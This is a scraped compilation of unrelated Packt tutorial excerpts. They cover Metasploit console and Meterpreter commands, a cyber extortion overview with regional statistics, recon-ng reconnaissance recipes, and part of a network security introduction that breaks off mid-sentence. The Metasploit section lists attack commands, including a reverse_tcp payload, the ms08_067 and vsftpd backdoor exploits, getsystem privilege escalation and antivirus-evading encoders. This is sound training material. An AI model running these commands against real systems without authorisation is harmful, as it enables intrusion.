Payload: This is a piece of code that runs at the target after successful exploitation. It defines the type of access and actions we need to gain on the target system.
Auxiliary: These are modules that provide additional functionalities such as scanning, fuzzing, sniffing, and much more.
Encoder: Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall.
Meterpreter: This is a payload that uses in-memory stagers based on DLL injection. It provides a variety of functions to perform at the target, which makes it a popular choice.

Architecture of Metasploit

Metasploit comprises various components such as extensive libraries, modules, plugins, and tools. A diagrammatic view of the structure of Metasploit is as follows:

Let's see what these components are and how they work. It is best to start with the libraries that act as the heart of Metasploit. Let's understand the use of the various libraries as explained in the following table:

REX: Handles almost all core functions, such as setting up sockets, connections, formatting, and all other raw functions.
MSF CORE: Provides the underlying API and the actual core that describes the framework.
MSF BASE: Provides friendly API support to modules.

We have many types of modules in Metasploit, and they differ regarding their functionality. We have payload modules for creating access channels to exploited systems. We have auxiliary modules to carry out operations such as information gathering, fingerprinting, fuzzing an application, and logging into various services. Let's examine the basic functionality of these modules, as shown in the following table:

Payloads: Payloads are used to carry out operations such as connecting to or from the target system after exploitation, or performing a particular task such as installing a service, and so on. Payload execution is the next step after the system is exploited successfully.
Auxiliary: Auxiliary modules are a special kind of module that performs specific tasks such as information gathering, database fingerprinting, scanning the network to find a particular service, enumeration, and so on.
Encoders: Encoders are used to encode payloads and the attack vectors to (or intending to) evade detection by antivirus solutions or firewalls.
NOPs: NOP generators are used for alignment, which results in making exploits stable.
Exploits: The actual code that triggers a vulnerability.

Metasploit framework console and commands

Gathering knowledge of the architecture of Metasploit, let us now run Metasploit to get hands-on knowledge of the commands and different modules. To start Metasploit, we first need to establish a database connection so that everything we do can be logged into the database. However, usage of databases also speeds up Metasploit's load time by making use of cache and indexes for all modules. Therefore, let us start the postgresql service by typing in the following command at the terminal:

root@beast:~# service postgresql start

Now, to initialize Metasploit's database, let us initialize msfdb as shown in the following screenshot:

It is clearly visible in the preceding screenshot that we have successfully created the initial database schema for Metasploit. Let us now start Metasploit's database using the following command:

root@beast:~# msfdb start

We are now ready to launch Metasploit. Let us issue msfconsole in the terminal to start Metasploit, as shown in the following screenshot:

Welcome to the Metasploit console. Let us run the help command to see what other commands are available to us:

The commands in the preceding screenshot are core Metasploit commands, which are used to set/get variables, load plugins, route traffic, unset variables, print the version, find the history of commands issued, and much more. These commands are pretty general. Let's see module-based commands, as follows:

Everything related to a particular module in Metasploit comes under the module controls section of the Help menu. Using the preceding commands, we can select a particular module, load modules from a particular path, get information about a module, show core and advanced options related to a module, and even edit a module inline.
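Before walking through the individual commands, the following is a minimal sketch of how these module controls fit together in a single console session. It selects the TCP port scanning auxiliary module, reviews and sets its options, and runs it; the address 192.168.10.112 is only a placeholder for a lab target, and the prompt text may differ slightly between Metasploit versions.

msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options
msf auxiliary(tcp) > set RHOSTS 192.168.10.112
msf auxiliary(tcp) > set PORTS 1-1000
msf auxiliary(tcp) > run
msf auxiliary(tcp) > back

The same pattern of use, show options, set, and then run or exploit applies to exploit modules as well, which is why the command reference that follows is worth keeping close at hand.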
Let us learn some basic commands in Metasploit and familiarize ourselves to the syntax and semantics of these commands: Command Usage Example use [auxiliary/exploit/payload/encoder] To select a particular msf>use exploit/unix/ftp/vsftpd_234_backdoor msf>use auxiliary/scanner/portscan/tcp show[exploits/payloads/encoder/auxiliary/options] To see the list of available modules of a particular type msf>show payloads msf> show options set [options/payload] To set a value to a particular object msf>set payload windows/meterpreter/reverse_tcp msf>set LHOST 192.168.10.118 msf> set RHOST 192.168.10.112 msf> set LPORT 4444 msf> set RPORT 8080 setg [options/payload] To assign a value to a particular object globally, so the values do not change when a module is switched on msf>setgRHOST 192.168.10.112 run To launch an auxiliary module after all the required options are set msf>run exploit To launch an exploit msf>exploit back To unselect a module and move back msf(ms08_067_netapi)>back msf> Info To list the information related to a particular exploit/module/auxiliary msf>info exploit/windows/smb/ms08_067_netapi msf(ms08_067_netapi)>info Search To find a particular module msf>search hfs check To check whether a particular target is vulnerable to the exploit or not msf>check Sessions To list the available sessions msf>sessions [session number]   Meterpreter commands Usage Example sysinfo To list system information of the compromised host meterpreter>sysinfo ifconfig To list the network interfaces on the compromised host meterpreter>ifconfig meterpreter>ipconfig (Windows) Arp List of IP and MAC addresses of hosts connected to the target meterpreter>arp background To send an active session to background meterpreter>background shell To drop a cmd shell on the target meterpreter>shell getuid To get the current user details meterpreter>getuid getsystem To escalate privileges and gain system access meterpreter>getsystem getpid To gain the process id of the meterpreter access meterpreter>getpid ps To list all the processes running at the target meterpreter>ps If you are using Metasploit for the very first time, refer to http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commandsfor more information on basic commands Benefits of using Metasploit Metasploit is an excellent choice when compared to traditional manual techniques because of certain factors which are listed as follows: Metasploit framework is open source Metasploit supports large testing networks by making use of CIDR identifiers Metasploit offers quick generation of payloads which can be changed or switched on the fly Metasploit leaves the target system stable in most of the cases The GUI environment provides a fast and user-friendly way to conduct penetration testing Summary Throughout this article, we learned the basics of Metasploit. We learned about various syntax and semantics of Metasploit commands. We also learned the benefits of using Metasploit. Resources for Article: Further resources on this subject: Approaching a Penetration Test Using Metasploit [article] Metasploit Custom Modules and Meterpreter Scripting [article] So, what is Metasploit? [article]
Introduction to Cyber Extortion

Packt
19 Jun 2017
21 min read
In this article by Dhanya Thakkar, the author of the book Preventing Digital Extortion, explains how often we make the mistake of relying on the past for predicting the future, and nowhere is this more relevant than in the sphere of the Internet and smart technology. People, processes, data, and things are tightly and increasingly connected, creating new, intelligent networks unlike anything else we have seen before. The growth is exponential and the consequences are far reaching for individuals, and progressively so for businesses. We are creating the Internet of Things and the Internet of Everything. (For more resources related to this topic, see here.) It has become unimaginable to run a business without using the Internet. It is not only an essential tool for current products and services, but an unfathomable well for innovation and fresh commercial breakthroughs. The transformative revolution is spillinginto the public sector, affecting companies like vanguards and diffusing to consumers, who are in a feedback loop with suppliers, constantly obtaining and demanding new goods. Advanced technologies that apply not only to machine-to-machine communication but also to smart sensors generate complex networks to which theoretically anything that can carry a sensor can be connected. Cloud computing and cloud-based applications provide immense yet affordable storage capacity for people and organizations and facilitate the spread of data in more ways than one. Keeping in mind the Internet’s nature, the physical boundaries of business become blurred, and virtual data protection must incorporate a new characteristic of security: encryption. In the middle of the storm of the IoT, major opportunities arise, and equally so, unprecedented risks lurk. People often think that what they put on the Internet is protected and closed information. It is hardly so. Sending an e-mail is not like sending a letter in a closed envelope. It is more like sending a postcard, where anyone who gets their hands on it can read what's written on it. Along with people who want to utilize the Internet as an open business platform, there are people who want to find ways of circumventing legal practices and misusing the wealth of data on computer networks by unlawfully gaining financial profits, assets, or authority that can be monetized. Being connected is now critical. As cyberspace is growing, so are attempts to violate vulnerable information gaining global scale. This newly discovered business dynamic is under persistent threat of criminals. Cyberspace, cyber crime, and cyber security are perceptibly being found in the same sentence. Cyber crime –under defined and under regulated A massive problem encouraging the perseverance and evolution of cyber crime is the lack of an adequate unanimous definition and the under regulation on a national, regional, and global level. Nothing is criminal unless stipulated by the law. Global law enforcement agencies, academia, and state policies have studied the constant development of the phenomenon since its first appearance in 1989, in the shape of the AIDS Trojan virus transferred from an infected floppy disk. Regardless of the bizarre beginnings, there is nothing entertaining about cybercrime. It is serious. It is dangerous. Significant efforts are made to define cybercrime on a conceptual level in academic research and in national and regional cybersecurity strategies. Still, as the nature of the phenomenon evolves, so must the definition. 
Research reports are still at a descriptive level, and underreporting is a major issue. On the other hand, businesses are more exposed due to ignorance of the fact that modern-day criminals increasingly rely on the Internet to enhance their criminal operations. Case in point: Aaushi Shah and Srinidhi Ravi from the Asian School of Cyber Laws have created a cybercrime list by compiling a set of 74 distinctive and creativelynamed actions emerging in the last three decades that can be interpreted as cybercrime. These actions target anything from e-mails to smartphones, personal computers, and business intranets: piggybacking, joe jobs, and easter eggs may sound like cartoons, but their true nature resembles a crime thriller. The concept of cybercrime Cyberspace is a giant community made out of connected computer users and data on a global level. As a concept, cybercrime involves any criminal act dealing withcomputers andnetworks, including traditional crimes in which the illegal activities are committed through the use of a computer and the Internet. As businesses become more open and widespread, the boundary between data freedom and restriction becomes more porous. Countless e-shopping transactions are made, hospitals keep record of patient histories, students pass exams, and around-the-clock payments are increasingly processed online. It is no wonder that criminals are relentlessly invading cyberspace trying to find a slipping crack. There are no recognizable border controls on the Internet, but a business that wants to evade harm needs to understand cybercrime's nature and apply means to restrict access to certain information. Instead of identifying it as a single phenomenon, Majid Jar proposes a common denominator approach for all ICT-related criminal activities. In his book Cybercrime and Society, Jar refers to Thomas and Loader’s working concept of cybercrime as follows: “Computer-mediated activities which are either illegal or considered illicit by certain parties and which can be conducted through global electronic network.” Jar elaborates the important distinction of this definition by emphasizing the difference between crime and deviance. Criminal activities are explicitly prohibited by formal regulations and bear sanctions, while deviances breach informal social norms. This is a key note to keep in mind. It encompasses the evolving definition of cybercrime, which keeps transforming after resourceful criminals who constantly think of new ways to gain illegal advantages. Law enforcement agencies on a global level make an essential distinction between two subcategories of cybercrime: Advanced cybercrime or high-tech crime Cyber-enabled crime The first subcategory, according to Interpol, includes newly emerged sophisticated attacks against computer hardware and software. On the other hand, the second category contains traditional crimes in modern clothes,for example crimes against children, such as exposing children to illegal content; financial crimes, such as payment card frauds, money laundering, and counterfeiting currency and security documents; social engineering frauds; and even terrorism. We are much beyond the limited impact of the 1989 cybercrime embryo. Intricate networks are created daily. They present new criminal opportunities, causing greater damage to businesses and individuals, and require a global response. 
Cybercrime is conceptualized as a service embracing a commercial component. Cybercriminals work as businessmen who look to sell a product or a service to the highest bidder.

Critical attributes of cybercrime

An abridged version of the cybercrime concept provides answers to three vital questions:

Where are criminal activities committed and what technologies are used?
What is the reason behind the violation?
Who is the perpetrator of the activities?

Where and how – realm

Cybercrime can be an online, digitally committed, traditional offense. Even if the component of an online, digital, or virtual existence were not included in its nature, it would still have been considered a crime in the traditional, real-world sense of the word. In this sense, as the nature of cybercrime advances, so must the spearheads of law enforcement rely on laws written for the non-digital world to solve problems encountered online. Otherwise, the combat becomes stagnant and futile.

Why – motivation

The prefix "cyber" sometimes creates additional misperception when applied to the digital world. It is critical to differentiate cybercrime from other malevolent acts in the digital world by considering the reasoning behind the action. This is imperative not only for clarification purposes, but also for extending the definition of cybercrime over time to include previously indeterminate activities. Offenders commit a wide range of dishonest acts for selfish motives such as monetary gain, popularity, or gratification. When the intent behind the behavior is misinterpreted, confusion may arise, and actions that should not have been classified as cybercrime could be charged with criminal prosecution.

Who – the criminal deed component

The action must be attributed to a perpetrator. Depending on the source, certain threats can be confined to the criminal domain only or expanded to endanger potentially larger targets, representing an attack on national security or a terrorist attack. Undoubtedly, the concept of cybercrime needs additional refinement, and a comprehensive global definition is in progress. Along with global cybercrime initiatives, national regulators are continually working on implementing laws, policies, and strategies to exemplify cybercrime behaviors and thus strengthen combating efforts.

Types of common cyber threats

In their endeavors to raise cybercrime awareness, the United Kingdom's National Crime Agency (NCA) divided common and popular cybercrime activities by affiliating them with the target under threat. While both individuals and organizations are targets of cyber criminals, it is the business-consumer networks that suffer irreparable damages due to the magnitude of harmful actions.

Cybercrime targeting consumers

Phishing: The term encompasses behavior where illegitimate e-mails are sent to the receiver to collect security information and personal details.
Webcam manager: A webcam manager is an instance of gross violating behavior in which criminals take over a person's webcam.
File hijacker: Criminals hijack files and hold them "hostage" until the victim pays the demanded ransom.
Keylogging: With keylogging, criminals have the means to record the text behind the keys you press on your keyboard.
Screenshot manager: A screenshot manager enables criminals to take screenshots of an individual's computer screen.
Ad clicker: Annoying but dangerous ad clickers direct a victim's computer to click on a specific harmful link.

Cybercrime targeting businesses

Hacking: Hacking is basically unauthorized access to computer data.
Hackers inject specialist software with which they try to take administrative control of a computerized network or system. If the attack is successful, the stolen data can be sold on the dark web and compromise people’s integrity and safety by intruding and abusing the privacy of products as well as sensitive personal and business information. Hacking is particularly dangerous when it compromises the operation of systems that manage physical infrastructure, for example, public transportation. Distributed denial of service (DDoS) attacks When an online service is targeted by a DDoS attack, the communication links overflow with data from messages sent simultaneously by botnets. Botnets are a bunch of controlled computers that stop legitimate access to online services for users. The system is unable to provide normal access as it cannot handle the huge volume of incoming traffic. Cybercrime in relation to overall computer crime Many moons have passed since 2001, when the first international treatythat targeted Internet and computer crime—the Budapest Convention on Cybercrime—was adopted. The Convention’s intention was to harmonize national laws, improve investigative techniques, and increase cooperation among nations. It was drafted with the active participation of the Council of Europe's observer states Canada, Japan, South Africa, and the United States and drawn up by the Council of Europe in Strasbourg, France. Brazil and Russia, on the other hand, refused to sign the document on the basis of not being involved in the Convention's preparation. In The Understanding Cybercrime: A Guide to Developing Countries(Gercke, 2011), Marco Gercke makes an excellent final point: “Not all computer-related crimes come under the scope of cybercrime. Cybercrime is a narrower notion than all computer-related crime because it has to include a computer network. On the other hand, computer-related crime in general can also affect stand-alone computer systems.” Although progress has been made, consensus over the definition of cybercrime is not final. Keeping history in mind, a fluid and developing approach must be kept in mind when applying working and legal interpretations. In the end, international noncompliance must be overcome to establish a common and safe ground to tackle persistent threats. Cybercrime localized – what is the risk in your region? Europol’s heat map for the period between 2014 and 2015 reports on the geographical distribution of cybercrime on the basis of the United Nations geoscheme. The data in the report encompassed cyber-dependent crime and cyber-enabled fraud, but it did not include investigations into online child sexual abuse. North and South America Due to its overwhelming presence, it is not a great surprise that the North American region occupies several lead positions concerning cybercrime, both in terms of enabling malicious content and providing residency to victims in the regions that participate in the global cybercrime numbers. The United States hosted between 20% and nearly 40% of the total world's command-and-control servers during 2014. Additionally, the US currently hosts over 45% of the world's phishing domains and is in the pack of world-leading spam producers. Between 16% and 20% percent of all global bots are located in the United States, while almost a third of point-of-sale malware and over 40% of all ransomware incidents were detected there. 
Twenty EU member states have initiated criminal procedures in which the parties under suspicion were located in the United States. In addition, over 70 percent of the countries located in the Single European Payment Area have been subject to losses from skimmed payment cards because of the distinct way in which the US, under certain circumstances, processes card payments without chip-and-PIN technology. There are instances of cybercrime in South America, but the scope of participation by the southern continent is way smaller than that of its northern neighbor, both in industry reporting and in criminal investigations. Ecuador, Guatemala, Bolivia, Peru, and Brazil are constantly rated high on the malware infection scale, and the situation is not changing, while Argentina and Colombia remain among the top 10 spammer countries. Brazil has a critical role in point-of-sale malware, ATM malware, and skimming devices. Europe The key aspect making Europe a region with excellent cybercrime potential is the fast, modern, and reliable ICT infrastructure. According to The Internet Organised Crime Threat Assessment (IOCTA) 2015, Cybercriminals abuse Western European countries to host malicious content and launch attacks inside and outside the continent. EU countries host approximately 13 percent of the global malicious URLs, out of which Netherlands is the leading country, while Germany, the U.K., and Portugal come second, third, and fourth respectively. Germany, the U.K., the Netherlands, France, and Russia are important hosts for bot C&C infrastructure and phishing domains, while Italy, Germany, the Netherlands, Russia, and Spain are among the top sources of global spam. Scandinavian countries and Finland are famous for having the lowest malware infection rates. France, Germany, Italy, and to some extent the U.K. have the highest malware infection rates and the highest proportion of bots found within the EU. However, the findings are presumably the result of the high population of the aforementioned EU countries. A half of the EU member states identified criminal infrastructure or suspects in the Netherlands, Germany, Russia, or the United Kingdom. One third of the European law enforcement agencies confirmed connections to Austria, Belgium, Bulgaria, the Czech Republic, France, Hungary, Italy, Latvia, Poland, Romania, Spain, or Ukraine. Asia China is the United States' counterpart in Asia in terms of the top position concerning reported threats to Internet security. Fifty percent of the EU member states' investigations on cybercrime include offenders based in China. Moreover, certain authorities quote China as the source of one third of all global network attacks. In the company of India and South Korea, China is third among the top-10 countries hosting botnet C&C infrastructure, and it has one of the highest global malware infection rates. India, Indonesia, Malaysia, Taiwan, and Japan host serious bot numbers, too. Japan takes on a significant part both as a source country and as a victim of cybercrime. Apart from being an abundant spam source, Japan is included in the top three Asian countries where EU law enforcement agencies have identified cybercriminals. On the other hand, Japan, along with South Korea and the Philippines, is the most popular country in the East and Southeast region of Asia where organized crime groups run sextortion campaigns. Vietnam, India, and China are the top Asian countries featuring spamming sources. 
Alternatively, China and Hong Kong are the most prominent locations for hosting phishing domains. From another point of view, the country code top-level domains (ccTLDs) for Thailand and Pakistan are commonly used in phishing attacks. In this region, most SEPA members reported losses from the use of skimmed cards. In fact, five (Indonesia, Philippines, South Korea, Vietnam, and Malaysia) out of the top six countries are from this region. Africa Africa remains renowned for combined and sophisticated cybercrime practices. Data from the Europol heat map report indicates that the African region holds a ransomware-as-a-service presence equivalent to the one of the European black market. Cybercriminals from Africa make profits from the same products. Nigeria is on the list of the top 10 countries compiled by the EU law enforcement agents featuring identified cybercrime perpetrators and related infrastructure. In addition, four out of the top five top-level domains used for phishing are of African origin: .cf, .za, .ga, and .ml. Australia and Oceania Australia has two critical cybercrime claims on a global level: First, the country is present in several top-10 charts in the cybersecurity industry, including bot populations, ransomware detection, and network attack originators. Second, the country-code top-level domain for the Palau Islands in Micronesia is massively used by Chinese attackers as the TLD with the second highest proportion of domains used for phishing. Cybercrime in numbers Experts agree that the past couple of years have seen digital extortion flourishing. In 2015 and 2016, cybercrime reached epic proportions. Although there is agreement about the serious rise of the threat, putting each ransomware aspect into numbers is a complex issue. Underreporting is not an issue only in academic research but also in practical case scenarios. The threat to businesses around the world is growing, because businesses keep it quiet. The scope of extortion is obscured because companies avoid reporting and pay the ransom in order to settle the issue in a conducive way. As far as this goes for corporations, it is even more relevant for public enterprises or organizations that provide a public service of any kind. Government bodies, hospitals, transportation companies, and educational institutions are increasingly targeted with digital extortion. Cybercriminals estimate that these targets are likely to pay in order to protect drops in reputation and to enable uninterrupted execution of public services. When CEOs and CIOs keep their mouths shut, relying on reported cybercrime numbers can be a tricky question. The real picture is not only what is visible in the media or via professional networking, but also what remains hidden and is dealt with discreetly by the security experts. In the second quarter of 2015, Intel Security reported an increase in ransomware attacks by 58%. Just in the first 3 months of 2016, cybercriminals amassed $209 million from digital extortion. By making businesses and authorities pay the relatively small average ransom amount of $10,000 per incident, extortionists turn out to make smart business moves. Companies are not shaken to the core by this amount. Furthermore, they choose to pay and get back to business as usual, thus eliminating further financial damages that may arise due to being out of business and losing customers. Extortionists understand the nature of ransom payment and what it means for businesses and institutions. As sound entrepreneurs, they know their market. 
Instead of setting unreasonable skyrocketing prices that may cause major panic and draw severe law enforcement action, they keep it low profile. In this way, they maintain the dark business in flow, moving from one victim to the next and evading legal measures. A peculiar perspective – Cybercrime in absolute and normalized numbers “To get an accurate picture of the security of cyberspace, cybercrime statistics need to be expressed as a proportion of the growing size of the Internet similar to the routine practice of expressing crime as a proportion of a population, i.e., 15 murders per 1,000 people per year.” This statement by Eric Jardine from the Global Commission on Internet Governance (Jardine, 2015) launched a new perspective of cybercrime statistics, one that accounts for the changing nature and size of cyberspace. The approach assumes that viewing cybercrime findings isolated from the rest of the changes in cyberspace provides a distorted view of reality. The report aimed at normalizing crime statistics and thus avoiding negative, realistic cybercrime scenarios that emerge when drawing conclusions from the limited reliability of absolute numbers. In general, there are three ways in which absolute numbers can be misinterpreted: Absolute numbers can negatively distort the real picture, while normalized numbers show whether the situation is getting better Both numbers can show that things are getting better, but normalized numbers will show that the situation is improving more quickly Both numbers can indicate that things are deteriorating, but normalized numbers will indicate that the situation is deteriorating at a slower rate than absolute numbers Additionally, the GCIG (Global Commission on Internet Governance) report includes some excellent reasoning about the nature of empirical research undertaken in the age of the Internet. While almost everyone and anything is connected to the network and data can be easily collected, most of the information is fragmented across numerous private parties. Normally, this entangles the clarity of the findings of cybercrime presence in the digital world. When data is borrowed from multiple resources and missing slots are modified with hypothetical numbers, the end result can be skewed. Keeping in mind this observation, it is crucial to emphasize that the GCIG report measured the size of cyberspace by accounting for eight key aspects: The number of active mobile broadband subscriptions The number of smartphones sold to end users The number of domains and websites The volume of total data flow The volume of mobile data flow The annual number of Google searches The Internet’s contribution to GDP It has been illustrated several times during this introduction that as cyberspace grows, so does cybercrime. To fight the menace, businesses and individuals enhance security measures and put more money into their security budgets. A recent CIGI-Ipsos (Centre for International Governance Innovation - Ipsos) survey collected data from 23,376 Internet users in 24 countries, including Australia, Brazil, Canada, China, Egypt, France, Germany, Great Britain, Hong Kong, India, Indonesia, Italy, Japan, Kenya, Mexico, Nigeria, Pakistan, Poland, South Africa, South Korea, Sweden, Tunisia, Turkey, and the United States. Survey results showed that 64% of users were more concerned about their online privacy compared to the previous year, whereas 78% were concerned about having their banking credentials hacked. 
Additionally, 77% of users were worried about cyber criminals stealing private images and messages. These perceptions led to behavioral changes: 43% of users started avoiding certain sites and applications, some 39% regularly updated passwords, while about 10% used the Internet less (CIGI-Ipsos, 2014). The GCIG report results are indicative of a heterogeneous cyber security picture. Although many cybersecurity aspects are deteriorating over time, there are some that are staying constant, and a surprising number are actually improving. Jardine compares cyberspace security to trends in crime rates in a specific country, operationalizing cyber attacks via 13 measures presented in the following table, as seen in Table 2 of Summary Statistics for the Security of Cyberspace (E. Jardine, GCIG Report, p. 6):

Measure                           Minimum       Maximum         Mean          Standard Deviation
New Vulnerabilities               4,814         6,787           5,749         781.880
Malicious Web Domains             29,927        74,000          53,317        13,769.99
Zero-day Vulnerabilities          8             24              14.85714      6.336
New Browser Vulnerabilities       232           891             513           240.570
Mobile Vulnerabilities            115           416             217.35        120.85
Botnets                           1,900,000     9,437,536       4,485,843     2,724,254
Web-based Attacks                 23,680,646    1,432,660,467   907,597,833   702,817,362
Average per Capita Cost           188           214             202.5         8.893818078
Organizational Cost               5,403,644     7,240,000       6,233,941     753,057
Detection and Escalation Costs    264,280       455,304         372,272       83,331
Response Costs                    1,294,702     1,738,761       1,511,804     152,502.2526
Lost Business Costs               3,010,000     4,592,214       3,827,732     782,084
Victim Notification Costs         497,758       565,020         565,020       30,342

While reading the table results, an essential argument must be kept in mind. Statistics for cybercrime costs are not available worldwide. The author worked with the assumption that data about US costs of cybercrime indicates costs on a global level. For obvious reasons, however, this assumption may not be true, and many countries will have had significantly lower costs than the US. To mitigate the assumption's flaws, the author provides comparative levels for those measures. The organizational cost of data breaches in 2013 in the United States was a little less than six million US dollars, while the average on the global level, drawn from the Ponemon Institute's annual Cost of Data Breach Study (from 2011, 2013, and 2014 via Jardine, p. 7), put the overall cost of data breaches, including the US ones, at US$2,282,095. The conclusion is that US numbers will distort global cost findings by inflating the real costs, and will work against the paper's suggestion, which is that normalized numbers paint a rosier picture than the one provided by absolute numbers. Summary In this article, we have covered the birth and concept of cyber crime and the challenges law enforcement, academia, and security professionals face when combating its threatening behavior. We also explored the impact of cyber crime by numbers on varied geographical regions, industries, and devices. Resources for Article:  Further resources on this subject: Interactive Crime Map Using Flask [article] Web Scraping with Python [article]

article-image-web-application-information-gathering
Packt
05 Jun 2017
4 min read
Save for later

Web Application Information Gathering

Packt
05 Jun 2017
4 min read
In this article by Ishan Girdhar, author of the book Kali Linux Intrusion and Exploitation Cookbook, we will cover the following recipes: Setup API keys for the recon-ng framework Use recon-ng for reconnaissance (For more resources related to this topic, see here.) Setting up API keys for recon-ng framework In this recipe, we will see how we need to set up API keys before we start using recon-ng. Recon-ng is one of the most powerful information gathering tools; used appropriately, it can help pentesters locate a good amount of information from public sources. With the latest version available, recon-ng provides the flexibility to register it as your own app/client on various social networking websites. Getting ready For this recipe, you require an Internet connection and a web browser. How to do it... To set up recon-ng API keys, open the terminal, launch recon-ng, and type the commands shown in the following screenshot: Next, type keys list as shown in the following screenshot: Let's start by adding twitter_api and twitter_secret. Log in to Twitter, go to https://apps.twitter.com/, and create a new application as shown in the following screenshot: Click on Create Application. Once the application is created, navigate to the Keys and Access Tokens tab, and copy the secret key and API key as shown in the following screenshot: Copy the API key, reopen the terminal window, and run the following command to add the key: keys add twitter_api <your-copied-api-key> Now, enter the following command to enter the twitter_secret name in recon-ng: keys add twitter_secret <your_twitter_secret> Once you have added the keys, you can see them in the recon-ng tool by entering the following command: keys list How it works... In this recipe, you learned how to add API keys to the recon-ng tool. To demonstrate this, we created a Twitter application, used its API key and secret (twitter_api and twitter_secret), and added them to the recon-ng tool. The result is as shown in the following screenshot: Similarly, you will need to include all the other API keys in recon-ng if you want to gather information from those sources. In the next recipe, you will learn how to use recon-ng for information gathering. Use recon-ng for reconnaissance In this recipe, you will learn to use recon-ng for reconnaissance. Recon-ng is a full-featured web reconnaissance framework written in Python. Complete with independent modules, database interaction, built-in convenience functions, interactive help, and command completion, recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly. Getting ready You will require a working Kali Linux installation and an Internet connection. How to do it... Open a terminal and start the recon-ng framework, as shown in the following screenshot: Recon-ng has a look and feel similar to that of Metasploit. To see all the available modules, enter the following command: show modules Recon-ng will list all available modules, as shown in the following screenshot: Let's go ahead and use our first module for information gathering. Enter the following command: use recon/domains-vulnerabilities/punkspider Now, enter the commands shown in the following screenshot: As you can see, some vulnerabilities have been discovered and are publicly available. (A minimal sketch of this workflow, from adding the keys to running a module, is shown below.)
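For quick reference, here is a minimal sketch of the flow described above, from adding the Twitter keys to running the punkspider module. The target domain example.com is only a placeholder, and the exact prompts and module options may differ slightly between recon-ng versions:

root@kali:~# recon-ng
[recon-ng][default] > keys add twitter_api <your-copied-api-key>
[recon-ng][default] > keys add twitter_secret <your-copied-secret>
[recon-ng][default] > keys list
[recon-ng][default] > show modules
[recon-ng][default] > use recon/domains-vulnerabilities/punkspider
[recon-ng][default][punkspider] > show options
[recon-ng][default][punkspider] > set SOURCE example.com
[recon-ng][default][punkspider] > run

The same pattern (load a module, review its options, set SOURCE, run) applies to the other recon-ng modules used in the rest of this article.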
Let's use another module that fetches any known and reported vulnerabilities from xssed.com. The XSSed project was created in early February 2007 by KF and DP. It provides information on all things related to cross-site scripting vulnerabilities and is the largest online archive of XSS vulnerable websites. It's a good repository of XSS information to gather. To begin with, enter the following commands:
show modules
use recon/domains-vulnerabilities/xssed
show options
set SOURCE microsoft.com
show options
run
You will see the following output: As you can see, recon-ng has aggregated the publicly available vulnerabilities from XSSed, as shown in the following screenshot: Similarly, you can keep using the different modules until you get the required information regarding your target. Summary In this article, you learned how to add API keys to the recon-ng tool. To demonstrate this, we created a Twitter application, used its API key and secret (twitter_api and twitter_secret), and added them to the recon-ng tool. You also learned how to use recon-ng for reconnaissance. Resources for Article: Further resources on this subject: Getting Started with Metasploitable2 and Kali Linux [article] Wireless Attacks in Kali Linux [article] What is Kali Linux [article]

article-image-introduction-network-security
Packt
06 Apr 2017
18 min read
Save for later

Introduction to Network Security

Packt
06 Apr 2017
18 min read
In this article by Warun Levesque, Michael McLafferty, and Arthur Salmon, the authors of the book Applied Network Security, we will be covering the following topics, which will give an introduction to network security: Murphy's law The definition of a hacker and the types The hacking process Recent events and statistics of network attacks Security for individual versus company Mitigation against threats Building an assessment This world is changing rapidly with advancing network technologies. Unfortunately, sometimes the convenience of technology can outpace its security and safety. Technologies like the Internet of Things are ushering in a new era of network communication. We also want to change the mindset of those in the field of network security. Most current cyber security professionals practice defensive and passive security. They mostly focus on mitigation and forensic tactics to analyze the aftermath of an attack. We want to change this mindset to one of offensive security. This article will give insight on how a hacker thinks and what methods they use. Having knowledge of a hacker's tactics will give the reader a great advantage in protecting any network from attack. (For more resources related to this topic, see here.) Murphy's law Network security is much like Murphy's law in the sense that if something can go wrong, it will go wrong. To be successful at understanding and applying network security, a person must master the three Ps. The three Ps are persistence, patience, and passion. A cyber security professional must be persistent in their pursuit of a solution to a problem. Giving up is not an option. The answer will be there; it just may take more time than expected to find it. Having patience is also an important trait to master. When dealing with network anomalies, it is very easy to get frustrated. Taking a deep breath and keeping a cool head goes a long way in finding the correct solution to your network security problems. Finally, developing a passion for cyber security is critical to being a successful network security professional. Having that passion will drive you to learn more and evolve yourself on a daily basis to be better. Once you learn, you will improve and perhaps go on to inspire others to reach similar aspirations in cyber security. The definition of a hacker and the types A hacker is a person who uses computers to gain unauthorized access to data. There are many different types of hackers: white hat, grey hat, and black hat hackers. Some hackers are defined by their intention. For example, a hacker that attacks for political reasons may be known as a hacktivist. A white hat hacker has no criminal intent, but instead focuses on finding and fixing network vulnerabilities. Often companies will hire a white hat hacker to test the security of their network for vulnerabilities. A grey hat hacker is someone who may have criminal intent but not often for personal gain. Often a grey hat will seek to expose a network vulnerability without permission from the owner of the network. A black hat hacker is purely criminal. Their sole objective is personal gain. Black hat hackers take advantage of network vulnerabilities any way they can for maximum benefit. A cyber-criminal is another type of black hat hacker, who is motivated to attack for illegal financial gain. A more basic type of hacker is known as a script kiddie. A script kiddie is a person who knows how to use basic hacking tools but doesn't understand how they work.
They often lack the knowledge to launch any kind of real attack, but can still cause problems on a poorly protected network. Hackers tools There are a range of many different hacking tools. A tool like Nmap for example, is a great tool for both reconnaissance and scanning for network vulnerabilities. Some tools are grouped together to make toolkits and frameworks, such as the Social Engineering Toolkit and Metasploit framework. The Metasploit framework is one of the most versatile and supported hacking tool frameworks available. Metasploit is built around a collection of highly effective modules, such as MSFvenom and provides access to an extensive database of exploits and vulnerabilities. There are also physical hacking tools. Devices like the Rubber Ducky and Wi-Fi Pineapple are good examples. The Rubber Ducky is a usb payload injector, that automatically injects a malicious virus into the device it's plugged into. The Wi-Fi Pineapple can act as a rogue router and be used to launch man in the middle attacks. The Wi-Fi Pineapple also has a range of modules that allow it to execute multiple attack vectors. These types of tools are known as penetration testing equipment. The hacking process There are five main phases to the hacking process: Reconnaissance: The reconnaissance phase is often the most time consuming. This phase can last days, weeks, or even months sometimes depending on the target. The objective during the reconnaissance phase is to learn as much as possible about the potential target. Scanning: In this phase the hacker will scan for vulnerabilities in the network to exploit. These scans will look for weaknesses such as, open ports, open services, outdated applications (including operating systems), and the type of equipment being used on the network. Access: In this phase the hacker will use the knowledge gained in the previous phases to gain access to sensitive data or use the network to attack other targets. The objective of this phase is to have the attacker gain some level of control over other devices on the network. Maintaining access: During this phase a hacker will look at various options, such as creating a backdoor to maintain access to devices they have 